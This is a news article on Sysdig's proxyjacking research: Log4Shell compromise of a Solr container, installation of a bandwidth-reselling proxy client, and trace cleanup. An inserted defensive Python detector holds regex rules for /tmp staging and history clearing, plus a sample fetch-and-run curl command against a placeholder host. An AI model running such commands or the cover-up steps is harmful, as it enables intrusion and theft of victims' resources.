  • Proxyjacking has become a profitable business for cybercriminals

    The Sysdig Threat Research Team has discovered a new attack vector based on the interception of legitimate proxy services that allow people to sell part of their bandwidth to third parties.

    Sysdig researchers said that a new attack vector called "proxyjacking" allows cybercriminals to earn hundreds of thousands of dollars a month in the form of passive income.

    According to Kaspersky Lab, proxy services work like this: The user installs a client that creates a proxy server. The client makes the Internet connection of the device available to an external party - a proxy service, which then resells part of the user's bandwidth to other people.

    Proxy technology has found use among users who use someone else's IP address to bypass geoblocks or view dubious websites without being tied to their own IP address. Usually, people pay per IP address based on the number of hours the application is running.

    In one of the attacks observed by Sysdig researchers, attackers compromised a container in the cloud using a Log4j vulnerability (Log4Shell) and then installed a proxy client that turned the system into a proxy server without the knowledge of the container owner. The attacker then sold the IP address of the compromised device to a proxy service.

    Typically, Log4j attacks involve a hacker downloading a backdoor or cryptojacking payload onto a device. Crystal Morin, threat research engineer at Sysdig, said that proxyjacking is similar to cryptojacking in that they both benefit from the victim's bandwidth - and both are about equally beneficial to the attacker. However, the two attacks differ in that the miner uses CPU resources, while proxyjacking uses network resources, with minimal CPU load.

    Morin noted that the impact of proxyjacking on the system is negligible: 1 GB of network traffic distributed over the course of a month amounts to tens of megabytes per day - it is very likely that the attack will go unnoticed.

    In the discovered attack, hackers compromised an unpatched Apache Solr service running on a Kubernetes infrastructure in order to take control of a container in the environment. Then the cybercriminals downloaded a malicious script from the C2 server, which they placed in the "/tmp" folder in order to be able to use the compromised module to make money.

    The researchers noticed that the attackers tried to cover up traces of malicious activity by clearing the history and deleting the downloaded binary file, as well as temporary files.
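The sequence described above (a script staged in "/tmp", followed by history clearing and file deletion) can be correlated per container as a detection rule. The following is an added example, not code from Sysdig or from this article; the event format, container names, rule names and sample command lines are constructed assumptions.

```python
import re
from collections import defaultdict

# Behaviours named in the article, as regexes over a recorded command line.
# Rule names are hypothetical labels chosen for this example.
RULES = {
    "download_to_tmp": re.compile(r"\b(curl|wget)\b.*\s/tmp/\S+"),
    "exec_from_tmp":   re.compile(r"^(?:(?:ba|da)?sh\s+)?/tmp/\S+"),
    "history_clear":   re.compile(r"\bhistory\s+-c\b|\bunset\s+HISTFILE\b"),
    "tmp_file_delete": re.compile(r"\brm\b.*\s/tmp/\S+"),
}
STAGING = {"download_to_tmp", "exec_from_tmp"}   # payload placed or run in /tmp
CLEANUP = {"history_clear", "tmp_file_delete"}   # traces being removed

# Constructed sample events: (container, command line). Not real telemetry.
SAMPLE_EVENTS = [
    ("solr-7d9f", "java -jar start.jar --module=http"),
    ("solr-7d9f", "curl -s -o /tmp/p.sh http://files.example.invalid/p.sh"),
    ("solr-7d9f", "sh /tmp/p.sh"),
    ("solr-7d9f", "/tmp/proxyclient --start"),
    ("solr-7d9f", "rm -f /tmp/proxyclient /tmp/p.sh"),
    ("solr-7d9f", "history -c"),
    ("web-55c1", "rm -rf /tmp/cache-1234"),   # routine cleanup, no staging
    ("web-55c1", "nginx -g daemon off;"),
]

def detect(events):
    """Return {container: matched rules} for containers that both staged
    something in /tmp and then removed traces. Either signal alone is common
    in benign workloads, so only the combination is flagged."""
    seen = defaultdict(set)
    for container, cmdline in events:
        for name, rx in RULES.items():
            if rx.search(cmdline):
                seen[container].add(name)
    return {c: sorted(hits) for c, hits in seen.items()
            if hits & STAGING and hits & CLEANUP}

if __name__ == "__main__":
    for container, hits in detect(SAMPLE_EVENTS).items():
        print(f"ALERT {container}: {', '.join(hits)}")
```

Because proxyjacking leaves almost no CPU footprint, process-level signals like these are more dependable than resource-usage thresholds tuned for miners.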

    Researchers estimate that for 24 hours of activity from a single hacked IP address, an attacker can earn $9.60 per month. Experts noted that if 100 IP addresses are compromised, a cybercriminal can earn passive income of almost $1,000 per month.

    When exploiting Log4j on unpatched systems, this figure could be even higher, as millions of servers are still running vulnerable versions of the logging tool, and according to Censys, more than 23,000 of them are reachable from the internet. “Theoretically, the Log4j vulnerability alone could bring an attacker more than $220,000 in profit per month,” Morin said.

    To avoid huge bills for using proxies, organizations should set billing limits and verification tool alerts, the researchers say.

    Author DeepWeb